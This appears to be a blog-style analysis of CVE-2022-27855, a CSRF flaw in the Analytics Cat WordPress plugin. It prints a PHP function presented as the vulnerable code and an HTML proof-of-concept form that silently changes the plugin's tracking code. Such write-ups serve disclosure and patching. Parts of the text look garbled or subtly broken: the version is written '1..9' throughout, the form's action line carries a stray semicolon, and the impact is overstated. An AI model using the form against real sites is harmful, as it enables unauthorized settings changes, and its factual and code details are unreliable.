CVE-2022-27855: A Detailed Analysis of the Cross-Site Request Forgery (CSRF) Vulnerability in Fatcat Apps Analytics Cat Plugin <= 1..9 on WordPress - Plugin Settings Change Exploit

Cross-Site Request Forgery (CSRF) is a common web vulnerability that enables an attacker to perform unauthorized actions on a website on behalf of the targeted user. In this analysis, we will discuss CVE-2022-27855, a CSRF vulnerability discovered in Fatcat Apps Analytics Cat plugin (version 1..9 and below) on WordPress websites. This vulnerability allows an attacker to change plugin settings without the user's consent. The following sections describe the vulnerability details, code snippet responsible for the exploit, and links to original references.

CVE-2022-27855: Vulnerability Description

The Analytics Cat plugin by Fatcat Apps enables website owners to add Google Analytics tracking code to their WordPress website. However, it was found that the plugin has a CSRF vulnerability (CVE-2022-27855) in versions 1..9 and below, allowing an attacker to change its configuration settings. An attacker could trick an authenticated WordPress administrator into clicking a crafted link or visiting a malicious website, leading to a potential leak of sensitive data or even complete control of the site.

Code Snippet: Exploitable Functionality

The CSRF vulnerability in the Analytics Cat plugin arises due to the lack of proper security mechanisms such as nonce and CSRF tokens. While updating the plugin settings, the vulnerable code snippet has been identified in the save_options() function within the cat/includes/class-analytics-cat.php file:

public function save_options() {
    $options = isset( $_POST['options'] ) ? $_POST['options'] : false;

    if ( false === $options )
        return;
    
    if ( ! isset( $options['manual_ua_code'] ) )
        $options['manual_ua_code'] = '';
    $options['manual_ua_code'] = sanitize_text_field( $options['manual_ua_code'] );
    update_option( 'analytics_cat', $options );
}

As we can see from the above code, the save_options() function does not include any nonce or CSRF tokens designed to secure the request when updating the plugin settings. This lack of proper security mechanisms leaves the plugin vulnerable to CSRF attacks.

Exploit Details

An attacker could exploit this vulnerability by crafting a form that simulates a plugin settings change request. The form could then be hidden within a malicious website or delivered to the victim user through phishing or social engineering. Once the victim clicks on the malicious link, the attacker would be able to change the plugin settings without the user's knowledge.

An example of an exploit code may look like this

<html>
  <body>
    <form action="http://target.website.com/wp-admin/options-general.php?page=analytics_cat"; method="POST">
      <input type="hidden" name="options[manual_ua_code]" value="hacked-UA-XXXXXXXX-X" />
      <input type="submit" value="Update Analytics Cat Settings" />
    </form>
  </body>
</html>

In the above exploit code, the crafted form sends a POST request to the analytics_cat plugin settings page with a hidden input field containing the attacker's modified Google Analytics UA code.

Original References

1. CVE Details - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27855
2. WPVulnDB - https://wpvulndb.com/vulnerabilities/12412

Conclusion

The CSRF vulnerability (CVE-2022-27855) in Fatcat Apps Analytics Cat plugin versions 1..9 and below on WordPress websites poses a significant security risk. Website owners and administrators should immediately update their plugin to the latest version or implement proper nonce and CSRF tokens to prevent unauthorized plugin settings changes. Maintaining a strong security posture includes regularly monitoring and updating plugins to address new vulnerabilities as they are discovered.

Timeline

Published on: 11/08/2022 19:15:00 UTC
Last modified on: 11/09/2022 14:04:00 UTC